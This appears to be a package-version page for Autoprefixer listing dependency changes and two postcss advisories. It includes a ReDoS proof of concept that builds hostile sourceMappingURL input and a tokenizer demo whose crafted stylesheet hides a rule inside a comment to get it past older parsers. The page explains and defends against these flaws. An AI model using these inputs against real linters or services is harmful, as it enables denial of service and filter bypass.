Autoprefixer moved from version 1.1.20140403 to 1.1.20140410. Both releases serve the same purpose: parsing CSS and adding vendor prefixes to the rules that need them, using data from the "Can I Use" website to decide which prefixes each browser version still requires. That lets developers write clean, standards-compliant CSS while keeping the output rendering correctly for the broadest possible audience.
The runtime dependencies on postcss and fs-extra are unchanged between the two versions; the shifts are in development dependencies. should, used for writing expressive tests, moved from 3.2.0 to 3.3.0; Stylus, a CSS preprocessor, from 0.42.3 to 0.43.1; and Browserify, which bundles JavaScript modules for the browser, from 3.38.0 to 3.39.0. These are refinements to the testing and development workflow around Autoprefixer rather than changes to what it does.
Although the functionality is the same, use the most recent version available to get the latest bug fixes and updated browser-compatibility data. The advisories listed below are filed against the postcss dependency, and both concern what happens when postcss parses CSS that an attacker controls; a build that only processes the project's own stylesheets is exposed far less than a linter or service that parses external input.
All vulnerabilities related to version 1.1.20140410 of the package
Regular Expression Denial of Service in postcss
postcss versions before 7.0.36, and versions from 8.0.0 up to but not including 8.2.13, are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
The proof of concept below builds inputs containing an increasing number of unterminated sourceMappingURL comment openers and reports how long postcss.parse takes on each; parse time that grows faster than the input length is the symptom.
var postcss = require("postcss")

// Build "a{}" followed by n unterminated sourceMappingURL comment openers and a
// trailing "!" so that no annotation can ever be closed by "*/".
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm up with a well-formed annotation, then time the parser on ever larger inputs.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
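The proof of concept above needs a vulnerable postcss installed and only shows wall-clock time. As an added example that is neither the advisory's PoC nor postcss's own code, the self-contained script below models the regex shape behind the ReDoS next to a linear replacement, so the difference can be seen without the library. The regex named VULNERABLE_RE is an assumption: it is the sub-pattern quoted above with the "#" the PoC uses and a closing "*/" terminator appended. The last-annotation-wins behaviour of extractSafe is modelled on how the 8.2.13 fix is remembered here and is also an assumption; the sample inputs are constructed for this example.

```javascript
// Added example: vulnerable-shaped annotation regex vs. a linear extractor.
// Not postcss's code; VULNERABLE_RE and the "last annotation wins" rule are assumptions.
const MARKER = '/*# sourceMappingURL=';

// Vulnerable shape (assumed from the advisory's sub-pattern): greedy (.*) followed by
// more pattern. At every marker occurrence the engine runs (.*) to the end of the input
// and then backtracks one character at a time looking for "*/". With n unterminated
// markers that is n scans of the whole input: quadratic in the input length.
const VULNERABLE_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//;

function extractVulnerable(css) {
  const m = css.match(VULNERABLE_RE);
  return m ? m[1].trim() : null;
}

// Linear shape: find marker occurrences with a pattern that cannot backtrack across the
// input (\s* is bounded by the literal "#"), then locate "*/" with indexOf. Nothing is
// scanned more than a constant number of times, whatever the input looks like.
const MARKER_RE = /\/\*\s*# sourceMappingURL=/g;

function extractSafe(css) {
  let last = null;
  for (const m of css.matchAll(MARKER_RE)) last = m; // last annotation wins (assumption)
  if (!last) return null;
  const start = last.index + last[0].length;
  const end = css.indexOf('*/', start);
  return end === -1 ? null : css.slice(start, end).trim();
}

// Same construction as the PoC above: n openers and no closing "*/".
function buildAttack(n) {
  return 'a{}' + MARKER.repeat(n) + '!';
}

// Milliseconds taken by fn(input).
function timeIt(fn, input) {
  const t0 = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

const BENIGN = 'a{}/*# sourceMappingURL=a.css.map */'; // constructed sample input

if (typeof require !== 'undefined' && require.main === module) {
  console.log('benign:', extractVulnerable(BENIGN), extractSafe(BENIGN));
  // Doubling n should roughly quadruple the vulnerable time and barely move the safe one.
  for (const n of [250, 500, 1000]) {
    const attack = buildAttack(n);
    console.log(
      `n=${n} len=${attack.length}: vulnerable ${timeIt(extractVulnerable, attack).toFixed(1)} ms,` +
      ` safe ${timeIt(extractSafe, attack).toFixed(2)} ms`
    );
  }
}
```

Run it with node; both extractors agree on well-formed input, and on the attack input both return null, but only the vulnerable one pays a cost that grows with the square of the input size. The general lesson is the shape: a greedy unbounded group followed by further pattern is what makes a regex re-scan its input, and replacing that with a bounded match plus indexOf removes the problem without changing the accepted inputs.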
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS). A bare carriage return (\r) can be handled differently by PostCSS than by other CSS consumers, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS so that text which other consumers treat as part of a comment is parsed by PostCSS as CSS. After processing by PostCSS, that text appears in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
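To make the discrepancy concrete, the following is an added example and not PostCSS's own code: a small tokenizer that models the parenthesis shortcut through which a bare \r slipped, run once with a bad-bracket check that does not mention \r and once with a check that does. The shortcut and the two regexes are reconstructed from memory of PostCSS's lib/tokenize.js and should be treated as assumptions; the sample stylesheet is constructed here around the page's @font-face{ font:(\r/*);} snippet, with a trailing rule and a closing */ added so the effect is visible.

```javascript
// Added example, not PostCSS's code. Model of the tokenizer shortcut: on "(" it looks for
// the next ")" and, if nothing "dangerous" sits between them, emits the whole span as one
// brackets token without ever checking for "/*". Which characters count as dangerous is
// the whole story: the pre-fix shape omits \r, the post-fix shape includes it (assumption).
const RE_BAD_BRACKET_WEAK = /.[\n"'(/\\]/;     // shape assumed for PostCSS before 8.4.31
const RE_BAD_BRACKET_FIXED = /.[\r\n"'(/\\]/;  // shape assumed for PostCSS 8.4.31

function tokenize(css, badBracketRe) {
  const tokens = [];
  let pos = 0;
  while (pos < css.length) {
    const ch = css[pos];
    if (ch === '/' && css[pos + 1] === '*') {
      // Comment: runs to the next "*/" or, if unclosed, to end of input.
      let end = css.indexOf('*/', pos + 2);
      end = end === -1 ? css.length : end + 2;
      tokens.push(['comment', css.slice(pos, end)]);
      pos = end;
    } else if (ch === '(') {
      const close = css.indexOf(')', pos + 1);
      const content = css.slice(pos, close + 1);
      if (close === -1 || badBracketRe.test(content)) {
        tokens.push(['(', '(']);          // slow path: the characters inside are tokenized normally
        pos += 1;
      } else {
        tokens.push(['brackets', content]); // fast path: "/*" inside is never seen as a comment
        pos = close + 1;
      }
    } else if ('{};:)'.includes(ch)) {
      tokens.push([ch, ch]);
      pos += 1;
    } else if (/\s/.test(ch)) {
      pos += 1; // whitespace carries no meaning for this demonstration
    } else {
      let end = pos + 1;
      while (end < css.length && !/[\s{};:()]/.test(css[end]) &&
             !(css[end] === '/' && css[end + 1] === '*')) end += 1;
      tokens.push(['word', css.slice(pos, end)]);
      pos = end;
    }
  }
  return tokens;
}

// Everything the tokenizer would hand on to the parser, i.e. all non-comment tokens joined.
function nonCommentText(css, badBracketRe) {
  return tokenize(css, badBracketRe)
    .filter((t) => t[0] !== 'comment')
    .map((t) => t[1])
    .join('');
}

// Constructed sample: the page's snippet, followed by a rule that should be hidden inside
// the comment opened by "/*", and the "*/" that closes that comment.
const SAMPLE = '@font-face{ font:(\r/*);}.evil{color:red}*/';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('weak,  \\r:', JSON.stringify(nonCommentText(SAMPLE, RE_BAD_BRACKET_WEAK)));
  console.log('fixed, \\r:', JSON.stringify(nonCommentText(SAMPLE, RE_BAD_BRACKET_FIXED)));
  console.log('weak,  \\n:', JSON.stringify(nonCommentText(SAMPLE.replace('\r', '\n'), RE_BAD_BRACKET_WEAK)));
}
```

With the weak check, (\r/*) is swallowed as a single brackets token, so ".evil{color:red}" reaches the parser as an ordinary rule; with the fixed check, or with \n in place of \r under either check, the "/*" opens a comment and that rule disappears. A browser applies the CSS Syntax preprocessing step, which replaces \r with \n before tokenizing, so it always sees the comment; the gap between the first and third lines of output is exactly the discrepancy a linter relying on the old behaviour would miss.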